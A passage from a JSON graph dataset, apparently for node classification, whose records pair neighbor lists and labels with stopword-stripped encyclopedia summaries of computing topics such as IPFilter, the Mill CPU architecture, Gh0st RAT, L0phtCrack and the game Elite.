      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8816,
    "label": 4,
    "text": "IPFilter:ipfilter ipfilter commonly referred ipf open-source software package provides firewall services network address translation nat many unix-like operating systems author software maintainer darren reed ipfilter supports ipv4 ipv6 protocols stateful firewall ipfilter delivered freebsd netbsd solaris 10 11 illumos used part openbsd removed may 2001 due problems license negotiations theo de raadt reed broke subsequently replaced openbsd pf developed openbsd developers dragonfly bsd removed support ipfilter may 2011 ipfilter installed runtime-loadable kernel module directly incorporated operating system kernel depending specifics kernel user preferences software documentation recommends module approach possible operating systems support ipfilter include",
    "neighbors": [
      2049,
      2563,
      7702,
      4636,
      9762,
      550,
      10790,
      1071,
      8753,
      569,
      5177,
      5178,
      9279,
      2118,
      8266,
      7249,
      9306,
      10851,
      9844,
      10872,
      9343,
      6797,
      1172,
      2212,
      3243,
      1708,
      1718,
      5819,
      10433,
      11459,
      8395,
      8909,
      4814,
      9423,
      10451,
      7383,
      10455,
      6361,
      6364,
      7907,
      5860,
      10987,
      8943,
      11506,
      5363,
      9971,
      1273,
      9983,
      1792,
      1286,
      1801,
      10000,
      274,
      5397,
      1304,
      9496,
      6431,
      10531,
      5924,
      8998,
      10535,
      3885,
      7983,
      11573,
      823,
      11577,
      11073,
      1858,
      10574,
      1361,
      850,
      4435,
      9048,
      4953,
      2907,
      6491,
      7521,
      1891,
      3942,
      2415,
      7027,
      5492,
      2421,
      2424,
      4480,
      1927,
      9625,
      1946,
      3482,
      1436,
      4511,
      6049,
      11184,
      11698,
      5057,
      9671,
      1993,
      7121,
      10708,
      4568,
      4571,
      998,
      4073,
      2545,
      3058,
      9201
    ],
    "mask": "Test"
  },
  {
    "node_id": 8817,
    "label": 7,
    "text": "Ping_Identity:ping identity ping identity corporation software company established 2000 andre durand bryan field-elliot headquartered denver colorado united states development offices denver colorado bangalore india ping also european operations offices london paris switzerland well offices bangalore melbourne tokyo serving asia-pacific company software provides federated identity management web identities via attribute based access controls similar identity management system tools developed microsoft okta products include pingid pingfederate pingone pingaccess pingdirectory pingdataconvernance pingintelligence ping identity received number rounds funding beginning series apr 16 2004 since received 35m kohlberg kravis roberts sep 18 2014 44m dfj growth w capital partners jul 16 2013 well 21m silicon valley bank triangle peak partners jun 21 2011 13m appian ventures vista equity partners private equity firm based san francisco acquired majority ownership ping identity leveraged buyout 600m jun 1 2016 ping already taken 125m funding point ping valued 2b 3b vista equity partners take company public rather sell often case vista goldman sachs leading ping identity ipo company partnered salesforce.com oracle crm on-demand vendavo pros provide identity management centralized login organizations july 2012 eran hammer resigned role lead author oauth 2.0 project withdrew ietf working group removed name specification due conflict web enterprise cultures hammer gave presentation conference explaining views citing ietf community enterprise use cases capable simple oauth initially designed oauth 2.0 blueprint authorization protocol says enterprise way providing whole new frontier sell consulting services integration solutions",
    "neighbors": [
      10090
    ],
    "mask": "None"
  },
  {
    "node_id": 8818,
    "label": 4,
    "text": "Project_Shield:project shield project shield anti-distributed-denial-of-service anti-ddos service offered jigsaw subsidiary google parent company alphabet inc. websites media elections human rights related content main goal project serve small under-resourced news sites vulnerable web ’ growing epidemic ddos attacks according team lead george conard similar services offered companies like cloudflare google initially announced project shield ideas conference october 21 2013 service initially offered trusted testers february 25 2016 google opened service qualifying website google-owned reverse proxy identifies filters malicious traffic may 2018 jigsaw announced would start offering free protection distributed denial service attacks us political campaigns candidates political action committees setting project shield involves changing dns domain traffic website goes google ’ system gets front page project shield provides news human rights elections monitoring sites protection ddos distributed denial service system caching storing data protected website reduce load site also filters traffic thwart ddos attacks project shield built google cloud services provided free charge qualifying websites independent journalists human rights elections monitoring websites protect regardless location project shield 2016 october users europe asia north america africa",
    "neighbors": [
      2409,
      8805,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 8819,
    "label": 3,
    "text": "Konami_Game_Master:konami game master utility cartridge released konami december 12 1985 meant used conjunction konami msx game cartridges allowing users select stages adjust number lives save progress high scores make screen dumps play slow motion among uses updated model called released february 18 1988 new version adds support msx2 games features battery backup allows users save data via s-ram compatible games",
    "neighbors": [
      5538,
      3181,
      9006,
      2096,
      10931,
      11380,
      4317
    ],
    "mask": "Test"
  },
  {
    "node_id": 8820,
    "label": 3,
    "text": "Sapphire_Rapids:sapphire rapids sapphire rapids intel cpu microarchitecture based either second refinement 10 nanometer process new 7 nanometer process used part tinsley workstation server platform 2020 limited information desktop/mobile version sapphire rapids exists difficulties 10 nm 7 nm fabrication processes may result release pushed back 2021 earliest",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      6339,
      5444,
      9541,
      1998,
      2638,
      5073,
      7134,
      1119,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      499,
      3317,
      4217,
      5883,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 8821,
    "label": 9,
    "text": "Sawzall_(programming_language):sawzall programming language sawzall procedural domain-specific programming language used google process large numbers individual log records sawzall first described 2003 szl runtime open-sourced august 2010 however since mapreduce table aggregators released open-sourced runtime useful large-scale data analysis multiple log files shelf sawzall replaced lingo logs go purposes within google google server logs stored large collections records protocol buffers partitioned many disks within gfs order perform calculations involving logs engineers write mapreduce programs c++ java mapreduce programs need compiled may verbose necessary writing program analyze logs time-consuming make easier write quick scripts rob pike et al developed sawzall language sawzall script runs within map phase mapreduce emits values tables reduce phase script writer concerned aggregates tables multiple runs single set tables currently language runtime runs sawzall script single input open-sourced supporting program built mapreduce released interesting features include sawzall design favors efficiency engine simplicity power complete sawzall program read input produce three results number records sum values sum squares values",
    "neighbors": [
      4096,
      1409,
      4995,
      5892,
      8455,
      7816,
      9610,
      5262,
      8719,
      3600,
      6800,
      5522,
      1427,
      5524,
      7700,
      10645,
      11408,
      10009,
      8858,
      1435,
      9244,
      10393,
      798,
      7967,
      288,
      7841,
      10525,
      4901,
      1959,
      3499,
      7595,
      10284,
      3633,
      1203,
      5431,
      2875,
      10045,
      7359,
      196,
      3269,
      3782,
      8262,
      11590,
      11592,
      4683,
      4044,
      10445,
      9039,
      3664,
      3409,
      4048,
      3795,
      4433,
      11343,
      1240,
      7548,
      8285,
      8413,
      6367,
      8799,
      9949,
      2658,
      6632,
      5483,
      236,
      5100,
      9712,
      9970,
      499,
      7926,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 8822,
    "label": 3,
    "text": "Mill_architecture:mill architecture mill architecture novel belt machine-based computer architecture general-purpose computing development since 2003 ivan godard startup mill computing inc. formerly named box computing east palo alto california mill computing claims 10x single-thread power/performance gain conventional out-of-order superscalar architectures runs programs without rewrite mill computing founded persons formerly worked together family digital signal processors dsps philips trimedia designers claim power cost improvements come adapting dsp-like deeply-pipelined processor general-purpose code timing hazards branches memory access said handled via speculative execution pipelining late binding statically-scheduled logic claimed improvements power area said come eliminating dynamic optimizing hardware register-renaming out-of-order execution hazard management dynamic cache optimizing replace hardware mill processor designed timing memory-access behavior predictable single cycles scheduling subject highly-optimizing compiler mill uses long instruction word vliw -style encoding store 33 simple operations wide instruction words termed opcodes mill uses two program counters every wide instruction split two parts one program counters counts backward code every linear instruction block executed middle outside two almost independent decoders unused operations deleted small fixed-format data item center instruction helps maintain code density reducing incidence no-operation codes mill code also allows functional unit start speculatively executing instruction field discard result instruction ivan godard designer mill quotes research finding operation standard register machine values stored processor registers 6 accessed never 80 14 thus mill uses novel temporal register addressing scheme belt analogy conveyor belt operands arithmetic logic units alus functional units may taken position belt result computation dropped stored front position belt advancing belt make room belt fixed length drops front matched older operands falling back pushed-off operands become inaccessible must explicitly saved still needed later work operations instruction set work data belt data registers main memory cells typical instruction like codice_1 argument operands come explicitly named positions belt result dropped front ready next instruction operations multiple results simply drop values belt front example division produce quotient remainder operations overflow produce double-wide results belt instructions encoded operation code opcode two belt positions added fields specify result register memory address literal constant encoding easily extended richer operations two inputs one result constant operands dropped separate codice_2 instructions access program variables main random-access memory ram segregated separate codice_3 codice_4 instructions containing one memory address way calculate address belt operands belt machines variants load/store opcodes access local variables heap offsets pointer belt various special-purpose base registers similarly instructions branch address taken belt along branches relative program counter drop result moves prior belt content along later positions queue given operand continually changes position hence address result later execution effect access operand position zero request recent value dropped belt example reference position five sixth recent drop thus addresses belt operands reflect belt history time temporal addressing hard human programmers keep track belt contents hence operand addresses writing assembly code belt machine however easy compiler track changing contents emit correct position addresses generated code belt fixed length may short hold live transient operands pushed end operand needed longer belt lifetime must saved still belt spill later restored belt needed fill situation equivalent need spill registers memory program runs registers general-register machine spilled operands may written memory using normal store instructions restored using normal load instructions spill fill may use special-purpose storage associated operations faster offer advantages load store operands belt read-only new results overwrite prior values belt thus single-assignment structure immune data hazards must dealt modern out-of-order general-register machines dense machine code valuable 1960s main memory costly limited even mainframe computers became important initially-tiny memories minicomputers microprocessors density remains important today applications smartphone downloaded browsers slow internet connections read-only memory rom embedded applications general advantage increased density improved effectiveness caches instruction prefetch belt machines smaller instructions register-based machines due needing destination address results saving make significant difference fixed-length instruction formats normally use power-of-two instruction widths thirty-two addressable elements registers general-register machine belt positions belt machine element address occupies five bits instruction needing 15 bits three-address format general-register machine 10 bits using two-address format belt machine bits also needed opcode information instruction power-of-two constrained instruction width often determines maximum number addressable elements possible design typically belt machine instruction support encoding double number addressable elements compared general-register machine instruction width similar gains variable-length instruction encodings overall belt machine code less compact stack machines use operand addresses often must introduce stack-manipulation instructions unneeded belt machine instructions accumulator machines padded multiple register fields instead use return stack need extra memory reference instructions belt machine presents operand queue program model mill architecture n't implement belt physical queue shift register implemented hardware instead semantic representation bypass network present fast computers intercepts pipelined accesses registers routing directly execution units need result number registers reasonably small needed pipeline output functional unit one possible belt item small number registers reduces size power complexity network access registers live data values kept conveniently addressable physical resources individual registers register files static random-access memory sram operand forwarding functional units generally moved duration belt lifetime instruction decoder maps logical belt positions physical locations mapping updated reflect changes logical position arising newly dropped results patent belt granted 2016 depending type success load operations mill also assigns metadata belt item including status width vectorization count operations operate item described thus width vector count part instruction coding operation fails failure information hashed placed destination metadata use debugging mill also uses metadata assist speculative execution pipelining example vector load operation fails e.g. part leaves protection boundary parts belt entry marked codice_5 nar metadata allows speculatively-executed vector code emulate per-vector-item fault behavior nar items create fault attempt occurs store perform non-speculative code never used fault ever created mill architecture appears able reduce size complexity pipelined loop code pipeline video every operation required cope special operand value called codice_6 confused codice_7 floating point formats special semantics purpose operations least one argument codice_6 generally produce codice_6 output codice_6 attempted stored memory store portion store vectors elements codice_6 ignored leaving memory location undisturbed special codice_6 value implemented reserved bit pattern using extra metadata bits associated belt item first iterations pipelined loop code drops group codice_13 belt using special codice_14 operation tells cpu many items drop cycle however many real items drop onto belt previous scheduled operations codice_14 drops enough additional codice_13 bring total number drops cycle requested amount steady state reached generally codice_13 generated way belt always expected number new items usual steady-state loop body operate codice_13 acting placeholders data n't ready operations scheduled previous iterations loop begin dropping results belt therefore starts new loop iteration real data items fewer placeholder codice_13 ordering rules simultaneous drops different-latency operations codice_14 ensure real results appear new iterations always occupy position codice_6 previous iterations operation use input belt number iterations meanwhile store operations loop body receive codice_6 values loop steady state reached therefore effect real results available storing thus loop body handles steady-state pipeline code includes appropriate codice_14 operations acts prologue code processing final elements pipeline generally finished loop deliberately execute extra iterations remaining scheduled operations time finish stored memory nearly operations side effects attempted invalid memory reads merely produce codice_24 value belt cause fault unless used store flow control operation pipeline nested loops mill treats loop almost like subroutine call automatic saves restores appropriate state belt scratchpad another improvement said open instruction-level parallelism mill instructions phased instructions may span several clock cycles hold 33 operations within instruction finishing occurs math operations first data rearrangements middle stores memory last also operations even multiple cores operate statically-predictable prioritized timings several versions mill processor development spanning tin low-end uses gold high-performance uses company estimates dual-core gold chips implemented 28 nm lithography may work 1.2 ghz typical thermal design power tdp 28watts performance 79 billion operations per second different versions mill intended different markets said different instruction set architectures different numbers execution units different pipeline timings thus different binaries accommodate compilers required emit specification recompiled executable binary recompiler supplied mill computing company way code distributed adapted specifics exact model pipeline binary coding etc development many tool sets processor designs may impractically costly ivan godard said mill plan develop software tools accept specification mill processor write software tools assembler compiler backend simulator verilog describing cpu demo video mill claimed show early versions software create assembler simulator bulk compiler said port llvm incomplete",
    "neighbors": [
      7173,
      9739,
      6160,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      1083,
      2620,
      2623,
      2113,
      7234,
      2638,
      11361,
      3175,
      8815,
      6268,
      3197,
      7313,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      249,
      1798,
      1801,
      6926,
      6415,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      8514,
      4423,
      8523,
      2383,
      7505,
      9044,
      344,
      1376,
      10603,
      4465,
      372,
      10612,
      11125,
      1399,
      7033,
      1402,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      5059,
      453,
      466,
      1499,
      7134,
      5090,
      995,
      7653,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 8823,
    "label": 3,
    "text": "Stormbringer_(video_game):stormbringer video game stormbringer computer game written david jones released 1987 mastertronic mastertronic added dimension label originally released zx spectrum commodore 64 amstrad cpc msx version atari st published 1988 fourth final game magic knight series in-game music david whittaker magic knight finally returns home obtained second-hand time-machine tyme guardians end knight tyme however accident whilst travelling back two magic knights off-white knight dreaded stormbringer called storm cloud plans use destroy magic knight magic knight kill off-white knight without destroying process option find off-white knight merge gameplay takes form graphic adventure commands inputted via windimation menu-driven interface style previous two games spellbound knight tyme 1986 magic knight limited amount strength consumed performing actions moving screen screen well sapped various enemies stormbringer storm cloud spinning axes balls bounce around rooms avoided need player monitor magic knight strength avoid enemies means stormbringer gameplay closer arcade adventure feel spellbound rather much pure graphic adventure feel knight tyme previous two magic knight games characters magic knight interact help magic knight spellcasting abilities also important solving game puzzles including merge spell used finds off-white knight",
    "neighbors": [
      11518,
      10931,
      5828,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 8824,
    "label": 4,
    "text": "Gh0st_RAT:gh0st rat gh0st rat trojan horse windows platform operators ghostnet used hack many sensitive computer networks cyber spying computer program rat part name refers software ability operate remote administration tool ghostnet system disseminates malware selected recipients via computer code attached stolen emails addresses thereby expanding network allowing computers infected according infowar monitor iwm ghostnet infection causes computers download trojan known gh0st rat allows attackers gain complete real-time control computer controlled inspected hackers software even ability turn camera audio-recording functions infected computer capabilities enabling monitors see hear goes room",
    "neighbors": [
      10756,
      5002,
      9227,
      6797,
      7983,
      9233,
      150,
      9688,
      7515,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 8825,
    "label": 1,
    "text": "ActiveJPA:activejpa activejpa open-source application framework written java object-relational mapping based java persistence api jpa strictly follow jsr 338 specification implements different design patterns technologies framework originated effort add behavior entities making act active records also implements different way proxying persistence operations transaction management intercepting operations validating logging caching using cross-cutting concerns decouple responsibilities retain modularity encapsulating aspects coding convention best way decrease number decisions made developers implementing technology activejpa require initial configuration datasource connection details database running persistence context supports specific unconventional aspects application well using annotations using type safe domain-specific language dsl database queries made using fluent object-oriented interface persistence operations transaction management interception validation logging caching vertically defined using cross-cutting concerns encapsulating responsibilities aspects improves performance scatters tangles code design implementation database access abstracted jdbc 4.2 specification supporting java 1.7 new jdbc features activejpa handles jta nested transactions global transactions transactions managed jdbc connection",
    "neighbors": [
      4358,
      3080,
      522,
      910,
      5658,
      10526,
      2339,
      5031,
      5677,
      7983,
      6074,
      10683,
      7485,
      3518,
      5567,
      9665,
      9926,
      6860,
      10573,
      3920,
      4944,
      11221,
      4572,
      4960,
      2658,
      5987,
      3560,
      3561,
      3562,
      5612,
      5872,
      9078,
      3705,
      9467,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 8826,
    "label": 7,
    "text": "CopperEgg:copperegg copperegg corporation cloud computing systems management company based austin texas copperegg provinces family software service saas based cloud monitoring services public private cloud environments services include server monitoring website monitoring web application monitoring track system application performance alerts helps troubleshoot system application issues copperegg software products integrate public cloud providers amazon ec2 rackspace crn magazine included company list 10 hot new cloud startups watch 2011 2013 company recognized 2013 north america frost sullivan award new product innovation within cloud monitoring solutions company offers free version paid version software scott johnson eric anderson co-founded copperegg 2010 johnson previously co-founded thomas conrad networking hardware company acquired compaq computer corp. 1995 went co-found surgient networks 2000 chief technology officer anderson formerly software consultant held engineering roles austin-based centaur technology also worked johnson previous startup austin called storspeed inc copperegg name reference egg columbus columbus egg refers brilliant idea discovery seems simple easy fact also pays homage nikola tesla demonstrated principles rotating magnetic field induction motor demonstrating make copper egg stand end 2013-07-09 idera inc. announced acquisition copperegg corporation company stated acquisition would combine idera database monitoring copperegg server application performance management software give customers better visibility control environments saas-based management 2016 copperegg corporation web site ceases operational redirected idera inc. page copperegg monitoring software renamed 'uptime cloud monitor copperegg raised total 4.1m series funding backed austin-based silverton partners webb investment network investment fund former ebay executive maynard webb several private investors company raised initial round 2m funding july 2011 raised additional 2.1m ten months later may 2012 also hired new ceo bob quillin lead expansion push product build accelerate sales marketing copperegg addressing market according idc spending public cloud services growing compounding annual growth rate cagr 27.6 percent 21.5 billion 2010 72.9 billion 2015 451 group reports copperegg 200 paying customers company strategic partnerships companies amazon aws advanced technical partner rackspace solarwinds blitz io new economics technologies consumption models driving adoption cloud computing companies like copperegg developing products address new challenges go along lack visibility control copperegg provides collection saas-based cloud monitoring analytic solutions help companies accelerate delivery applications services across public private cloud environments company flagship product server monitoring solution called revealcloud originally launched july 2011 revealcloud provides real-time server monitoring linux windows freebsd mac os x servers 5 second on-screen performance updates visible saas application key unique features include less 10 second install web 2.0 graphical interface copperegg extended product introducing server application process monitoring update 2012 company launched second product july 2012 website monitoring solution called revealuptime revealuptime provides 15-second response time uptime health updates websites web applications web services tcp ports visible saas application performance metrics viewed together corresponding servers monitored revealcloud product october 2012 copperegg added management api provides open programmatic access automating orchestrating server monitoring website uptime analysis cloud infrastructure management update also added software-defined monitoring devops integration third-party automation tools chef puppet",
    "neighbors": [
      4194,
      3819
    ],
    "mask": "None"
  },
  {
    "node_id": 8827,
    "label": 4,
    "text": "L0phtCrack:l0phtcrack l0phtcrack password auditing recovery application originally produced mudge l0pht heavy industries used test password strength sometimes recover lost microsoft windows passwords using dictionary brute-force hybrid attacks rainbow tables one crackers tools choice although use old versions low price high availability initial version released spring 1997 application produced stake l0pht merged stake 2000 stake acquired symantec 2004 symantec later stopped selling tool new customers citing us government export regulations discontinued support december 2006 january 2009 l0phtcrack acquired original authors zatko wysopal rioux symantec l0phtcrack 6 announced 11 march 2009 source boston conference l0phtcrack 6 contains support 64-bit windows platforms well upgraded rainbow tables support l0phtcrack 7 released 30 august 2016 seven years previous release l0phtcrack 7 supports gpu cracking increasing performance 500 times previous versions",
    "neighbors": [
      9217,
      7426,
      6916,
      7556,
      7557,
      5512,
      6797,
      3477,
      10135,
      2716,
      10279,
      4140,
      7983,
      8637,
      8513,
      1861,
      8135,
      6345,
      733,
      3937,
      9569,
      5111,
      9214
    ],
    "mask": "Test"
  },
  {
    "node_id": 8828,
    "label": 5,
    "text": "IEEE_802.1AE:ieee 802.1ae 802.1ae ieee mac security standard also known macsec defines connectionless data confidentiality integrity media access independent protocols standardized ieee 802.1 working group key management establishment secure associations outside scope 802.1ae specified 802.1x-2010 802.1ae standard specifies implementation mac security entities secy thought part stations attached lan providing secure mac service client standard defines security tag inside frame addition ethertype includes ieee 802.1ae macsec standard specifies set protocols meet security requirements protecting data traversing ethernet lans macsec allows unauthorised lan connections identified excluded communication within network common ipsec ssl macsec defines security infrastructure provide data confidentiality data integrity data origin authentication assuring frame comes station claimed send macsec mitigate attacks layer 2 protocols publishing history",
    "neighbors": [
      8708,
      7045,
      3847,
      7049,
      1941,
      5270,
      5671,
      6187,
      172,
      4396,
      3762,
      434,
      11321,
      5439,
      3780,
      6098,
      10329,
      10332,
      8674,
      4581,
      5863,
      11125,
      8694,
      6904,
      3838
    ],
    "mask": "None"
  },
  {
    "node_id": 8829,
    "label": 2,
    "text": "Nintendo_3DS_system_software:nintendo 3ds system software nintendo 3ds system software set updatable firmware versions software frontend nintendo 3ds family video game consoles updates downloaded via system internet connection allow nintendo add remove features software updates also include changes previous updates home menu graphical shell similar nintendo dsi menu wii u menu nintendo 3ds nintendo 2ds systems used launch software stored nintendo ds nintendo 3ds game cards applications installed sd card dsiware titles installed system ’ internal memory application icons set grid navigable touchscreen d-pad may re-arranged via drag-and-drop amount icons per column also changed 1 icon 6 menu display 120 application tiles upper screen special 3d animated logo displayed individual app well system information wireless signal strength date time battery life bottom screen application icons displayed also possible change screen brightness menu using home button users suspend current software running bring home menu allowing user launch certain multitasking applications internet browser miiverse similarly nintendo dsi menu upgradeable firmware game cards also hot-swapped menu power button prompts user either put console sleep mode shut april 25 2012 system update brought introduction folder system 60 folders created applications dragged top folder order move apps added folder using procedure 60 apps per folder title folder automatically created order creation 1 60 name also edited user first character title displayed folder icon apps inside folders receive streetpass spotpass notifications notification icon appear top folder june 20 2013 system update brought introduction save data backup feature feature allows user back save data downloadable nintendo 3ds software virtual console games creating backup save data allows users delete software sd card without losing save data backup created automatically restored user re-downloads software nintendo eshop total 30 save data backups stored time possible back save data retail versions nintendo 3ds software dsiware game boy advance software october 6 2014 9.0 system update brought revamp entire home menu exception multitasking applications also adding support themes allowing users customize home menu theme adds new backgrounds changes folder icons background music sound effects match theme new application called nintendo badge arcade released december 2014 japan november 2015 america europe allows yet customizing menu using badges pay-to-play crane game badges accessed/used via additional menu within home menu installed upon loading game placed removed like normal software icons/folders badges act shortcuts access specific pre-installed applications streetpass mii plaza nintendo 3ds camera built-in photo video recorder integrated media gallery photo editing functionality app uses system ’ two front-facing cameras take 3-d photos user-facing camera take regular 2-d photos photographs taken resolution 640 × 480 px vga 0.3 megapixels addition manual recording controls timers set take photo three ten seconds pressing take button means voice commands saying ok wishing take photo sd cards hold 3,000 photos photo data size vary number may reduced two may decrease various options filters available taking photos recording video addition normal mode low-light option useful taking photos recording video dark lighting conditions options include manual controls color type normal black white sepia negative solarize sharpness contrast brightness real-time photo filters also available including sparkle adds moving stars photo dream adds dream-like bright light photo pinhole lightens center screen darkens edges mystery adds random finish photo also special mode called merge takes photo user facing inner camera merges photo someone facing outer cameras december 7 2011 system update added ability record 3-d video along three special recording options interval shot allows sequences images recorded short-timed intervals create time-lapse photography frame pick edits still images together create stop motion animation montage lets user pause resume recording seamlessly videos recorded 10 minutes sd card ’ enough space available shooting time reduced however recording modes allow single video ten minutes long despite advanced predecessor software fewer features predecessor nintendo dsi camera even ’ enough free space sd card hold maximum combined total 3,000 photos videos nintendo 3ds sound built-in music player sound recorder supported audio codecs include mp3 audio .mp3 filename extensions aac audio .mp4 .m4a .3gp filename extensions audio files played sd card visualizations displayed upper screen music played console sleep mode using system ’ headphone jack using headphones included mic button button toggle play/pause skip next previous track set sound manipulation options available well several audio filters ten-second voice recordings also recorded edited audio filters manipulated modulation playback speed users may save modify 18 console ’ memory 180 sd card used throughout applications swapnote ’ streetpass function built-into app user streetpass ’ someone also streetpass enabled users exchange song data song ’ name artist album release year many times ’ played also compatibility chart users involved depending amount matching songs users score displayed ranging 0 100 latter compatible despite advanced predecessor software features fewer filters themes predecessor nintendo dsi sound nintendo 3ds uses friend code system much like original wii connect network exception one code necessary console makes much easier flexible players interact internet regardless nintendo network services require nintendo network id account order accessed nintendo eshop miiverse account shared wii u nintendo switch nintendo network administration team moderators staff remove inappropriate content services miiverse streetpass close proximity data exchange functionality allows game content exchanged nintendo 3ds systems using console background connectivity sleep mode nintendo 3ds automatically discover nintendo 3ds systems within range establish connection exchange content mutually played games transparently without requiring user input example user passes someone software initiate battle collect trophies application streetpass content stored one twelve data slots console using data slot nintendo 3ds users readily share exchange content multiple games time whenever connected regardless game card currently console spotpass always background network connectivity system automatically seek connect wireless network nodes wi-fi hotspots sending downloading information background sleep mode playing game spotpass also makes uses certified hotspots partners north america cloud united kingdom users able connect hotspots automatically free charge content downloaded via spotpass include full game application downloads firmware updates patches specific in-game content customized fit user preferences including opting altogether selected software application similar e-book reader considered use functionality automatically acquire magazine newspaper articles august 5 2013 system update introduced new feature called streetpass relay feature allows users exchange streetpass data passing certified nintendo zone hotspot last nintendo 3ds user pass hotspot streetpass enabled united states 29,000 street pass relay points europe set see approximately 30,000 day later feature also became available japan date streetpass relay points updated north america europe allow six users stored exchange instead one streetpass mii plaza streetpass application comes pre-installed every nintendo 3ds system players meet players miis streetpass online nintendo network interact application player mii customized hats earned mini games along short customizable message information new mii characters encountered system appear plaza gate player use play various mini games encountering mii characters meeting mii characters multiple times adds extra functionality personalized messages ability rate application comes three minigames minigames purchased optionally nintendo zone viewer built-in application detects makes use certified spotpass hotspots hotspot detected notification would appear system home menu application users could see game trailers game screenshots download game demos view information current upcoming nintendo 3ds titles player leaves hotspot app remains nintendo 3ds system although content accessed nintendo 3ds firmware run four different modes native_firm native running firmware nintendo 3ds software including home menu safe_mode_firm used safe mode applications system settings system updater twl_firm nintendo dsi native firmware used nintendo ds/dsi backward compatibility finally agb_firm game boy advance native firmware used run game boy advance virtual console games native_firm different new nintendo 3ds nomenclature firmware version shown 3ds system settings divided three parts first three numbers separated periods represent firmware version without eshop features one stored retail cartridges number dash represents improvements related eshop obtained via online update finally letter end represents region console possible letters china c europe australia e japan j south korea k taiwan americas u six regions exclusive firmware releases gaming platforms nintendo gaming platforms generation gaming platforms seventh generation",
    "neighbors": [
      6276,
      9477,
      11271,
      10761,
      4364,
      3089,
      5500,
      10393,
      6301,
      5406,
      4383,
      7325,
      673,
      3626,
      1067,
      684,
      4908,
      7727,
      3248,
      7857,
      7991,
      9784,
      1083,
      5824,
      7492,
      11079,
      9033,
      7246,
      2001,
      4305,
      2259,
      7253,
      3542,
      6486,
      3162,
      1501,
      607,
      7519,
      10080,
      2658,
      8423,
      10215,
      3561,
      10599,
      6763,
      6508,
      2925,
      495,
      8316,
      1524,
      5369,
      8315,
      1148,
      8829,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 8830,
    "label": 3,
    "text": "Elite_(video_game):elite video game elite space trading video game written developed david braben ian bell originally published acornsoft bbc micro acorn electron computers september 1984 elite open-ended game model revolutionary 3d graphics led ported virtually every contemporary home computer system earned place classic genre maker gaming history game title derives one player goals raising combat rating exalted heights elite elite one first home computer games use wire-frame 3d graphics hidden line removal added graphics twitch gameplay aspects genre established 1974 game star trader another novelty inclusion dark wheel novella robert holdstock gave players insight moral legal codes might aspire game followed sequels 1993 1995 introduced newtonian physics realistic star systems seamless freeform planetary landings third sequel elite dangerous began crowdfunding 2012 launched 16 december 2014 following period semi-open testing elite proved hugely influential serving model games including grand theft auto eve online freelancer x series man sky non-acorn versions first published firebird imagineer subsequently frontier developments claimed game game frontier part back catalogue rights game owned david braben player initially controls character commander jameson though name changed time game saved player starts lave station 100 credits lightly armed trading ship cobra mark iii ships player encounters similarly named snakes reptiles credits accumulated number means include piracy trade military missions bounty hunting asteroid mining money generated enterprises allows player upgrade ship enhancements better weapons increased cargo capacity automated docking system extra energy bank game universe stars single planets space station orbit stars always separated interstellar distances effectively untraversable using ship sublight engines travel stars accomplished hyperspace jumps constrained within range limited fuel capacity maximum 7 light years ship hyperdrive sublight fuel capacity apparently infinite fuel replenished docking space station requires matching ship rotation station entering docking bay task avoided purchasing docking computer equipment upgrades include fuel scoop allows raw fuel skimmed surface stars described manual dangerous difficult activity practice fairly simple process far easier manually docking space station—and collecting free-floating cargo canisters escape capsules liberated destruction ships making hyperspace jump star systems antagonistic thargoid insect race may intercept player half way forcing player ship remain witch-space battle smaller invasion ships interrupted jump uses full journey fuel player may insufficient fuel subsequently jump nearby planet trapping witch-space must use escape capsule owned abort game reload extremely expensive one-shot galactic hyperspace upgrade permits travel eight galaxies game universe little practical difference different galaxies however versions necessary travel least second galaxy access game missions planetary layout galaxies different many players discovered trade runs closely positioned planets fortuitous economic combinations versions elite included several optional missions galactic navy one requires tracking destroying stolen experimental ship another involves transporting classified information thargoids home planet thargoid invasion ships best see succeed throughout duration mission involving multiple interplanetary jumps rewards differed depending mission cash gems esoteric hardware cloaking device according braben bell elite inspired range sources developers refer star wars hitchhiker guide galaxy original battlestar galactica influences braben also cites works larry niven jerry pournelle arthur c. clarke robert l. forward isaac asimov orson scott card thought much game content derived traveller tabletop role-playing game including default commander name jameson david braben denied several times developers met jesus college cambridge bell already working game acornsoft called freefall braben started writing game called fighter yet completed two projects sufficiently similar braben bell compared notes seeing star raiders atari 800 decided collaborate produce eventually became elite first approached thorn emi company rejection letter stated game complicated needed finishable 10 minutes three lives braben bell met acornsoft demo elite combat docking sequences impressed managing director david johnson-davies acornsoft executives company agreed publish finished game although company feared ambitious braben bell uncertain merits two developers instead one single game game took two years write started 3d arcade game without trading element written machine code using assembly language giving much care maximum compactness code last part added 3d radar display fitted last unused bytes computer original bbc version used novel split screen approach show four colours onscreen simultaneously upper two thirds screen displayed mode 4 lower part mode 5 subsequent electron version ran entirely mode 4 video chips 100 compatible therefore black white elite universe contains eight galaxies 256 planets explore due limited capabilities 8-bit computers worlds procedurally generated single seed number run fixed algorithm appropriate number times creates sequence numbers determining planet complete composition position galaxy prices commodities name local details text strings chosen numerically lookup table assembled produce unique descriptions planet carnivorous arts graduates means extra memory needed store characteristics planet yet unique fixed properties galaxy also procedurally generated first braben bell first intended 2 galaxies 